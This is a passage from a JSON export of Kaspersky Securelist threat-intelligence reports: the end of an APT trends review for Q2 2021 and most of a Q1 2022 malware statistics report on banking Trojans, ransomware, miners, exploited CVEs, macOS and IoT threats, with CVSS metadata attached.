region](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>). Interestingly, the exploit was found in the wild as part of a separate framework, alongside CVE-2021-1732 as well as other previously patched exploits. We are highly confident that this framework is entirely unrelated to Bitter APT and was used by a different threat actor. Further analysis revealed that this Escalation of Privilege (EoP) exploit has potentially been used in the wild since at least November 2020. Upon discovery, we reported this new exploit to Microsoft in February. After confirmation that we were indeed dealing with a new zero-day, it received the designation CVE-2021-28310.\n\nVarious marks and artifacts left in the exploit mean that we are also highly confident that CVE-2021-1732 and CVE-2021-28310 were created by the same exploit developer that we track as &quot;Moses&quot;. &quot;Moses&quot; appears to be an exploit developer who makes exploits available to several threat actors, based on other past exploits and the actors observed using them. To date, we have confirmed that at least two known threat actors have utilized exploits originally developed by Moses: Bitter APT and Dark Hotel. Based on similar marks and artifacts, as well as privately obtained information from third parties, we believe at least six vulnerabilities observed in the wild in the last two years have originated from &quot;Moses&quot;. While the EoP exploit was discovered in the wild, we are currently unable to directly tie its usage to any known threat actor that we are currently tracking. The EoP exploit was probably chained together with other browser exploits to escape sandboxes and obtain system level privileges for further access. Unfortunately, we weren&#x27;t able to capture a full exploit chain, so we don&#x27;t know if the exploit is used with another browser zero-day, or coupled with exploits taking advantage of known, patched vulnerabilities.\n\nIn another, more recent investigation into the surge of attacks by APT actors against Exchange servers following the revelation of ProxyLogon and other Exchange vulnerabilities, we took note of one unique cluster of activity. It attracted our attention because the actor behind it seemed to have been active in compromising Exchange servers since at least December 2020, all the while using a toolset that we were not able to associate with any known threat group. During March, several waves of attacks on Exchange servers were made public, partially describing the same cluster of activity that we had observed. One of them, reported by ESET, contained an assessment that the actor behind this activity had access to the Exchange exploits prior to their public release, which aligns with our observations of the early activity of it last year. That said, none of the public accounts described sightings of the full infection chain and later stages of malware deployed as part of this group&#x27;s operation. Adopting the name Websiic, given publicly to this cluster of activity by ESET, we reported the TTPs of the underlying threat actor. Namely, we focused on the usage of both commodity tools like the China Chopper webshell and a proprietary .NET backdoor used by the group, which we dubbed &quot;Samurai&quot;, as well as describing a broader set of targets than the one documented thus far.\n\nOn 15 April, Codecov publicly disclosed that its Bash Uploader script had been compromised and was distributed to users between the 31 January and the 1 April. The Bash Uploader script is publicly distributed by Codecov and aims to gather information on the user&#x27;s execution environments, collect code coverage reports, and send them to the Codecov infrastructure. As a result, this script compromise effectively constitutes a supply-chain attack. The Bash uploader script is typically executed as a trusted resource in development and testing environments (including as part of automated build processes, such as continuous integration or development pipelines); and its compromise could enable malicious access to infrastructure or account secrets, as well as code repositories and source code. While we haven&#x27;t been able to confirm the malicious script deployment, retrieve any information on the compromise goals, or identify further associated malicious tools yet, we were able to collect one sample of a compromised Bash uploader script, as well as identify some possibly associated additional malicious servers.\n\nAn e-mail sent by Click Studios to its customers on 22 April informed them that a sophisticated threat actor had gained access to the Passwordstate automatic updating functionality, referred to as the in-place upgrade. Passwordstate is a password management tool for enterprises, and on 20 April, for a period of about 28 hours, a malicious DLL was included in the software updates. On 24 April, an incident management advisory was also released. The purpose of the campaign was to steal passwords stored in the password manager. Although this attack was only active for a short time, we managed to obtain the malicious DLLs and reported our initial findings. Nevertheless, it&#x27;s still unclear how the attackers gained access to the Passwordstate software to begin with. Following a new advisory published by Click Studio on 28 April, we discovered a new variant of the malicious DLL used to backdoor the Passwordstate password manager. This DLL variant was distributed in a phishing campaign, most likely by the same actor.\n\nA few days after April&#x27;s Patch Tuesday updates from Microsoft (13 April), a number of suspicious files caught our attention. These files were binaries, disguised as &quot;April 2021 Security Update Installers&quot;. They were signed with a valid digital signature, delivering Cobalt Strike beacon modules. It is likely that the modules were signed with a stolen digital certificate. These Cobalt Strike beacon implants were configured with a hardcoded C2, &quot;code.microsoft.com&quot;. Contrary to a (now redacted) publication from the Qihoo 360 team revolving around this activity, we can confirm that there was no compromise of Microsoft&#x27;s infrastructure. In fact, an unauthorized party took over the dangling subdomain &quot;code.microsoft.com&quot; and configured it to resolve to their Cobalt Strike host, setup around 15 April. That domain hosted a Cobalt Strike beacon payload served to HTTP clients using a specific and unique user agent. According to Microsoft and the initial Qihoo notification, the impact in this case was very limited and didn&#x27;t affect unsuspecting visitors to this website because of the required unique user agent.\n\nOn April 14-15, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for Remote Code Execution (RCE) in the Chrome web-browser, we were able to find and analyze an Escalation of Privilege (EoP) exploit used to escape the sandbox and obtain system privileges. The EoP exploit was fine-tuned to work against the latest and the most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the Information Disclosure vulnerability and CVE-2021-31956 to the EoP vulnerability. Both vulnerabilities were patched on June 8, as a part of the June Patch Tuesday. The exploit-chain attempts to install malware in the system through a dropper. The malware starts as a system service and loads the payload, a &quot;remote shell&quot;-style backdoor which in turns connects to the C2 to get commands. So far, we haven&#x27;t been able to find any connections or overlaps with a known actor. Therefore, we are tentatively calling this cluster of activity [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nOn April 16, we began hearing rumors about active exploitation of Pulse Secure devices from other researchers in the community. One day prior to this, the NSA, CISA, and FBI had jointly published an advisory stating that APT29 was conducting widespread scanning and exploitation of vulnerable systems, including Pulse Secure. For this reason, initial thoughts were that the two were related; and these were just rumors circulating the community about old activity that was being brought to light again. Following this, we were able to at least confirm that the initial rumors were part of a separate set of activities that had occurred between January and March and were not directly related to the advisory mentioned above. This new activity involved the exploitation of at least two vulnerabilities in Pulse Secure; one previously patched and one zero-day (CVE-2021-22893). We also became aware of affected organizations that were notified by a third party that they were potentially compromised by this activity. After exploitation, the threat actor proceeded to deploy a simple webshell to maintain persistence. On May 3, Pulse Secure delivered &quot;out-of-cycle&quot; update and workaround packages to provide a solution for the multiple vulnerabilities.\n\nCooperating with Check Point Research, we discovered an ongoing attack targeting a small group of individuals in Xinjiang and Pakistan, in regions mostly populated by the Uyghur minority. The attackers used malicious executables that collect information about the infected system and attempt to download a second-stage payload. The actor put considerable effort into disguising the payloads, whether by creating delivery documents that appear to be originating from the United Nations using up-to-date related themes, or by setting up websites for non-existing organizations claiming to fund charity groups. In our report, we examined the flow of both infection vectors and provided our analysis of the malicious artifacts we came across during this investigation, even though we were unable to obtain the later stages of the infection chain.\n\n## Final thoughts\n\nWhile the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organisation or compromising an individual&#x27;s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we&#x27;ve seen in Q2 2021:\n\n * We have reported several supply-chain attacks in recent months.. While some were major and have attracted worldwide attention, we observed equally successful low-tech attacks, such as BountyGlad, CoughingDown and the attack targeting Codecov.\n * APT groups mainly use social engineering to gain an initial foothold in a target network. However, we&#x27;ve seen a rise in APT threat actors leveraging exploits to gain that initial foothold - including the zero-days developed by the exploit developer we call &quot;Moses&quot; and those used in the PuzzleMaker, Pulse Secure attacks and the Exchange server vulnerabilities.\n * APT threat actors typically refresh and update their toolsets: this includes not only the inclusion of new platforms but also the use of additional languages as seen by WildPressure&#x27;s macOS-supported Python malware.\n * As illustrated by the campaigns of various threat actors - including BountyGlad, HotCousin, GoldenJackal, Scarcruft, Palwan, Pulse Secure and the threat actor behind the WebDav-O/Mail-O implants - geo-politics continues to drive APT developments.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T10:00:46", "type": "securelist", "title": "APT trends report Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-1732", "CVE-2021-22893", "CVE-2021-28310", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-07-29T10:00:46", "id": "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "href": "https://securelist.com/apt-trends-report-q2-2021/103517/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:56:48", "description": "\n\n * [IT threat evolution in Q1 2022](<https://securelist.com/it-threat-evolution-q1-2022/106513/>)\n * **IT threat evolution in Q1 2022. Non-mobile statistics**\n * [IT threat evolution in Q1 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q1-2022-mobile-statistics/106589/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q1 2022:\n\n * Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.\n * Web Anti-Virus recognized 313,164,030 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 107,848 unique users.\n * Ransomware attacks were defeated on the computers of 74,694 unique users.\n * Our File Anti-Virus detected 58,989,058 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2022 Kaspersky solutions blocked the launch of at least one piece of malware designed to steal money from bank accounts on the computers of 107,848 unique users.\n\n_Number of unique users attacked by financial malware, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231205/01-en-malware-report-q1-2022-pc.png>))_\n\n#### Geography of financial malware attacks\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231231/02-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.5 \n2 | Afghanistan | 4.0 \n3 | Tajikistan | 3.9 \n4 | Yemen | 2.8 \n5 | Uzbekistan | 2.4 \n6 | China | 2.2 \n7 | Azerbaijan | 2.0 \n8 | Mauritania | 2.0 \n9 | Sudan | 1.8 \n10 | Syria | 1.8 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n#### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 36.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 16.7 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.7 \n4 | SpyEye | Trojan-Spy.Win32.SpyEye | 6.3 \n5 | Gozi | Trojan-Banker.Win32.Gozi | 5.2 \n6 | Cridex/Dridex | Trojan-Banker.Win32.Cridex | 3.5 \n7 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 3.3 \n8 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 2.2 \n10 | Danabot | Trojan-Banker.Win32.Danabot | 1.8 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nOur TOP 10 leader changed in Q1: the familiar ZeuS/Zbot (16.7%) dropped to second place and Ramnit/Nimnul (36.5%) took the lead. The TOP 3 was rounded out by CliptoShuffler (6.7%).\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Law enforcement successes\n\n * Several members of the REvil ransomware crime group were [arrested](<https://tass.com/society/1388613>) by Russian law enforcement in January. The Russian Federal Security Service (FSB) [says](<http://www.fsb.ru/fsb/press/message/single.htm!id=10439388%40fsbMessage.html>) it seized the following assets from the cybercriminals: &quot;more than 426 million rubles ($5.6 million) including denominated in cryptocurrency; $600,000; 500,000 euros; computer equipment, the crypto wallets that were used to perpetrate crimes, and 20 luxury cars that were purchased with illicitly obtained money.&quot;\n * In February, a Canadian citizen was [sentenced](<https://www.bleepingcomputer.com/news/security/netwalker-ransomware-affiliate-sentenced-to-80-months-in-prison/>) to 6 years and 8 months in prison for involvement in NetWalker ransomware attacks (also known as Mailto ransomware).\n * In January, Ukrainian police [arrested](<https://www.bleepingcomputer.com/news/security/ukranian-police-arrests-ransomware-gang-that-hit-over-50-firms/>) a ransomware gang who delivered an unclarified strain of malware via e-mail. According to the statement released by the police, over fifty companies in the United States and Europe were attacked by the cybercriminals.\n\n#### HermeticWiper, HermeticRansom and RUransom, etc.\n\nIn February, new malware was discovered which carried out attacks with the aim of destroying files. Two pieces of malware \u2014 a Trojan called HermeticWiper that destroys data and a cryptor called [HermeticRansom](<https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/>) \u2014 were both [used](<https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/>) in cyberattacks in Ukraine. That February, Ukrainian systems were attacked by another Trojan called IsaacWiper, followed by a third Trojan in March called CaddyWiper. The apparent aim of this malware family was to render infected computers unusable leaving no possibility of recovering files.\n\nAn intelligence team later discovered that HermeticRansom only superficially encrypts files, and ones encrypted by the ransomware [can be decrypted](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>).\n\nRUransom malware was discovered in March, which was created to encrypt files on computers in Russia. The analysis of the malicious code revealed it was developed to wipe data, as RUransom generates keys for all the victim&#x27;s encrypted files without storing them anywhere.\n\n#### Conti source-code leak\n\nThe ransomware group Conti had its source code leaked along with its chat logs which were made public. It happened shortly after the Conti group [expressed](<https://www.theverge.com/2022/2/28/22955246/conti-ransomware-russia-ukraine-chat-logs-leaked>) support for the Russian government&#x27;s actions on its website. The true identity of the individual who leaked the data is currently unknown. According to different versions, it could have been a researcher or an insider in the group who disagrees with its position.\n\nWhoever it may have been, the leaked ransomware source codes in the public domain will obviously be at the fingertips of other cybercriminals, which is what happened on more than one occasion with examples like [Hidden Tear](<https://securelist.com/hidden-tear-and-its-spin-offs/73565/>) and Babuk.\n\n#### Attacks on NAS devices\n\nNetwork-attached storage (NAS) devices continue to be targeted by ransomware attacks. A new [wave of Qlocker Trojan infections](<https://www.bleepingcomputer.com/news/security/qlocker-ransomware-returns-to-target-qnap-nas-devices-worldwide/>) on QNAP NAS devices occurred in January following a brief lull which lasted a few months. A new form of ransomware infecting QNAP NAS devices also appeared in the month of January called [DeadBolt](<https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-deadbolt-ransomware-encrypting-nas-devices/>), and [ASUSTOR](<https://www.bleepingcomputer.com/news/security/deadbolt-ransomware-now-targets-asustor-devices-asks-50-btc-for-master-key/>) devices became its new target in February.\n\n#### Maze Decryptor\n\nMaster decryption keys for Maze, Sekhmet and Egregor ransomware were made public in February. The keys turned out to be authentic and we increased our support to decrypt files encrypted by these [infamous](<https://securelist.com/maze-ransomware/99137/>) forms of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) in our RakhniDecryptor utility. The decryptor is available on the website of our [No Ransom](<https://noransom.kaspersky.com/>) project and the website of the international NoMoreRansom project in the [Decryption Tools](<https://www.nomoreransom.org/en/decryption-tools.html>) section.\n\n### Number of new modifications\n\nIn Q1 2022, we detected eight new ransomware families and 3083 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q1 2021 \u2014 Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231301/03-en-ru-es-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q1 2022, Kaspersky products and technologies protected 74,694 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231325/04-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231349/05-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 2.08 \n2 | Yemen | 1.52 \n3 | Mozambique | 0.82 \n4 | China | 0.49 \n5 | Pakistan | 0.43 \n6 | Angola | 0.40 \n7 | Iraq | 0.40 \n8 | Egypt | 0.40 \n9 | Algeria | 0.36 \n10 | Myanmar | 0.35 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 24.38 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 13.71 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.35 \n4 | (generic verdict) | Trojan-Ransom.Win32.Phny | 7.89 \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.66 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.07 \n7 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 3.72 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 3.37 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 3.17 \n10 | (generic verdict) | Trojan-Ransom.Win32.Agent | 1.99 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q1 2022, Kaspersky solutions detected 21,282 new modifications of miners.\n\n_Number of new miner modifications, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231418/06-en-malware-report-q1-2022-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 508,449 unique users of Kaspersky products and services worldwide.\n\n_Number of unique users attacked by miners, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231445/07-en-malware-report-q1-2022-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231509/08-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 3.01 \n2 | Tajikistan | 2.60 \n3 | Rwanda | 2.45 \n4 | Uzbekistan | 2.15 \n5 | Kazakhstan | 1.99 \n6 | Tanzania | 1.94 \n7 | Ukraine | 1.83 \n8 | Pakistan | 1.79 \n9 | Mozambique | 1.69 \n10 | Venezuela | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarter highlights\n\nIn Q1 2022, a number of serious vulnerabilities were found in Microsoft Windows and its components. More specifically, the vulnerability [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) was found to be exploited by an unknown group of cybercriminals: a &quot;type confusion&quot; bug in the win32k.sys driver the attacker can use to gain system privileges. Also worth noting is [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919>), a vulnerability in the User Profile Service which makes it possible to elevate privileges, along with [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21836>), which can be used to forge digital certificates.\n\nOne of the major talking points in Q1 was an exploit that targeted the [CVE-2022-0847](<https://dirtypipe.cm4all.com/>) vulnerability in the Linux OS kernel. It was dubbed &quot;Dirty Pipe&quot;. [Researchers discovered](<https://securelist.com/cve-2022-0847-aka-dirty-pipe-vulnerability-in-linux-kernel/106088/>) an &quot;uninitialized memory&quot; vulnerability when analyzing corrupted files, which makes it possible to rewrite a part of the OS memory, namely page memory that contains system files&#x27; data. This in turn opens up an opportunity, such as elevating attacker&#x27;s privileges to root. It&#x27;s worth noting that this vulnerability is fairly easy to exploit, which means users of all systems should regularly install security patches and use all available means to prevent infection.\n\nWhen it comes to network threats, this quarter continued to show how cybercriminals often resort to the technique of brute-forcing passwords to gain unauthorized access to various network services, the most popular of which are MSSQL, RDP and SMB. Attacks using the EternalBlue, EternalRomance and similar exploits remain as popular as ever. Due to widespread unpatched versions of Microsoft Exchange Server, networks often fall victim to exploits of ProxyToken, ProxyShell, ProxyOracle and other vulnerabilities. One example of a critical vulnerability found is remote code execution (RCE) in the Microsoft Windows HTTP protocol stack which allows an attack to be launched remotely by sending a special network packet to a vulnerable system by means of the HTTP trailer functionality. New attacks on network applications which will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway. Specific examples of vulnerabilities in these applications are [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. For instance, the top place in the statistics is still firmly held by exploits targeting vulnerabilities in Microsoft Office and their share has increased significantly to 78.5%. The same common vulnerabilities we&#x27;ve written about on more than one occasion are still the most widely exploited within this category of threats. These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow when processing objects in a specially crafted document in the Equation Editor component and ultimately allow an attacker to execute arbitrary code. There&#x27;s also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office software gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year which is very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which they can use to exploit through a specially prepared Microsoft Office document with an embedded malicious ActiveX control for executing arbitrary code in the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly to just 7.64%. Browser developers put a great deal of effort into patching vulnerability exploits in each new version and closing a large number of gaps in system security. Apart from that, the majority of browsers have automatic updates as opposed to the distinct example of Microsoft Office, where many of its users still use outdated versions and are in no rush to install security updates. That could be precisely the reason why we&#x27;ve seen a reduction in the share of browser exploits in our statistics. However, this does not mean they&#x27;re no longer an immediate threat. For instance, Chrome&#x27;s developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a &quot;type confusion&quot; vulnerability in the V8 script engine which gives attackers the opportunity to remotely execute code (RCE) in the context of the browser&#x27;s security sandbox.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability which allows to corrupt the process memory and remotely execute arbitrary codes when performing specially generated scripts that use animation.\n\nSimilar vulnerabilities were found in the browser&#x27;s other components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>)which uses Web Store API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>) which is associated with vulnerabilities in the WebGL backend (ANGLE). Another vulnerability found was [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), which can be used to exploit a heap buffer overflow in Tab Groups, also potentially leading to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) multi-platform malware family with Windows and macOS variants that uses Google Drive to communicate with the C&amp;C server, along with the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>) with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users&#x27; browser history to its owners&#x27; servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### 